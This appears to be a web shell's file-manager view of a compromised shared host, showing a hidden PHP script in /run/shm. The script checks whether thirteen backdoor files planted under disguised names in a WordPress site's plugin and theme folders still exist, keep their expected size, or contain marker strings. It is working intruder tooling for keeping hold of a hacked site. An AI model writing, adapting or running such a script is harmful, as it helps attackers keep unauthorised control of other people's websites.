HEX
Server: Apache
System: Linux iad1-shared-b8-22 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: dh_7uh9vd (6523960)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: //run/shm/.hld
<?php   $r = '/home/randomgis/randomgis.cl'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@309909@@Clear-Site-Data",
"/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/deprecated/ActionScheduler_AdminView_Deprecated.php"=>"bd@@310604@@Server-Timing",
"/wp-content/plugins/fluent-smtp/database/FluentMailDBMigrator.php"=>"bd@@336207@@reverse_searcher",
"/wp-content/themes/widget_area_1748081006/paqe.php"=>"bd@@309336@@727",
"/wp-content/plugins/fluent-smtp/includes/libs/google-api-client/build/vendor/symfony/polyfill-intl-normalizer/sige.php"=>"bd@@336998@@1903",
"/wp-content/plugins/xcloner-backup-and-restore/vendor/microsoft/azure-storage-common/azure-storage-common/src/Common/Internal/Authentication/notifications.php"=>"bd@@336771@@1443",
"/wp-content/plugins/xcloner-backup-and-restore/vendor/microsoft/azure-storage-common/azure-storage-common/src/Common/Internal/Serialization/modform.inc.php"=>"bd@@311694@@1714",
"/wp-content/plugins/xcloner-backup-and-restore/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Exception/cache_ipbanned.php"=>"bd@@355222@@1574",
"/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tweetmeme.php"=>"bd@@354457@@Large-Allocation",
"/wp-content/plugins/contact-form-7/modules/stripe/stripe.php"=>"bd@@335780@@Clear-Site-Data",
"/wp-content/plugins/fluent-smtp/includes/libs/google-api-client/build/vendor/google/auth/src/corp.php"=>"bd@@355038@@1683",
"/wp-content/plugins/fluent-smtp/includes/libs/google-api-client/build/vendor/psr/cache/src/mod_gtranslate.php"=>"bd@@311278@@201",
"/wp-content/themes/search_template_1757871732/4O4.php"=>"bd@@471797@@967"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');